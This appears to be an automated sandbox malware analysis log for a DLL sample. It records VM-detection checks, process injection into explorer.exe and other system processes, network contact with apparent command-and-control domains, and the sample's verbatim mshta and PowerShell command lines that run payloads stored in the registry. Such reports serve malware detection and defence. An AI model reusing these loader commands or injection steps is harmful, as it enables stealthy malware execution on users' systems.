                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLLCR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452 Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080 Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4875
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4102
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4861
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0457A5F6
                      Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 00000030.00000000.1053923810.000001DA49E59000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
                      Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn
                      Source: explorer.exe, 0000001C.00000000.881750747.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                      Source: RuntimeBroker.exe, 00000025.00000000.976191564.0000027D4E762000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                      Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_0457CC4A
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0457198F
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_04580BC5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_04BBCC4A
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_04BB198F
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_04BC0BC5
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,49_2_0097198F
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,49_2_00980BC5
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,49_2_0097CC4A
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress,0_2_6E4B1552
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,0_2_045737F9
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB37F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,3_2_04BB37F9
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,49_2_009737F9

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
                      Source: C:\Windows\explorer.exe Domain query: art.microsoftsofymicrosoftsoft.at
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
                      Compiles code for process injection (via .Net compiler)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 9D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 660000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 2D2D64A0000 protect: page execute and read and write
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
                      Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 9D0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 9FA000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 2B60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 9FC000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 30F0000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD217F000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 660000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 2D2D64A0000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe | Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3424 base: 9FA000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3424 base: 2B60000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3424 base: 9FC000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3424 base: 30F0000 value: 80
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 4868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3424
Source: C:\Windows\explorer.exe | Thread register set: target process: 3656
Source: C:\Windows\explorer.exe | Thread register set: target process: 4268
Source: C:\Windows\explorer.exe | Thread register set: target process: 4772
Source: C:\Windows\explorer.exe | Thread register set: target process: 6752
Source: C:\Windows\explorer.exe | Thread register set: target process: 5288
Source: C:\Windows\explorer.exe | Thread register set: target process: 1260
Source: C:\Windows\System32\control.exe | Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe | Thread register set: target process: 6508
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
